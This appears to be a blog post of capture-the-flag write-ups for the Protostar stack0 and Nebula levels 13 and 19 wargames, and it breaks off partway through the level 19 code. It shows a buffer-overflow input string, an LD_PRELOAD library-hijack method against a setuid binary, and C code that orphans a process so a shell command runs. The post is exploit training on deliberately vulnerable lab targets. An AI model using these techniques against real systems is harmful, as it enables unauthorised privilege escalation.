Protostar – Stack0

I used a buffer overflow to pass this challenge. The goal is to change the int modified variable to anything other than 0 so that the if statement code path will trigger. To do this we overflow the buffer[64] variable until it spills over into the modified variable.

CMD=";echo -en abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz123456789123\x01\x01\x01\x01";
$CMD | /opt/protostar/bin/stack0

Nebula – Level 13

Congrats to Sarah Diesburg for solving this challenge !

I got the idea from a forum post. Basically, you can make your own library calls be called before the standard C library calls by creating your own library and loading it first using the $LD_PRELOAD environmental variable.

I modified the code slightly to just return 1000, which was the UID that the flag13 binary was looking for. Unfortunately, this didn’t work. Apparently LD_PRELOAD is ignored if the real and effective IDs don’t match. They didn’t match in our case, since the flag13 binary had the setuid bit. We bypassed this problem by copying the flag13 binary into our own home directory (level13). That reset the binary’s permissions and got rid of the setuid bit. We then loaded our fake library with our script and ran our version of the binary, which gave us the token.

level13@nebula:~$ ./ nebula ./flag13
The User: nebula The UID : 1000 your token is b705702b-76a8-42b0-8844-3adabbe5ac58

Nebula – Level 19

Level 19 is another access/file trickery. The code only does interesting stuff if its parent is perceived to be a root processes. Luckily, init is run as root thus, if we start flag19 as a child and then kill the parent (don’t wait on the child); init becomes the parent (orphan processes policy).

#include <unistd.h>     /* Symbolic Constants */
#include <sys/types.h>  /* Primitive System Data Types */
#include <errno.h>      /* Errors */
#include <stdio.h>      /* Input/Output */
#include <sys/wait.h>   /* Wait for Process Termination */
#include <stdlib.h>     /* General Utilities */

int main() {
    pid_t childpid; /* variable to store the child's pid */
    int retval;     /* child process: user-provided return code */
    int status;     /* parent process: child's exit status */

    childpid = fork();

    if (childpid >= 0) { // success
        if (childpid == 0) {    // child
        char cmd[] = "/home/flag19/flag19";
            //char *args1[] = { cmd, "-c", "touch /home/flag19/team_awesome", NULL };
            char *args1[] = { "/bin/sh", "-c", "touch /home/flag19/team_awesome", NULL };
            char *args2[] = { NULL };
            execve(cmd, args1, args2);

        } else {    // parent
        //waitpid(childpid, &status, 0);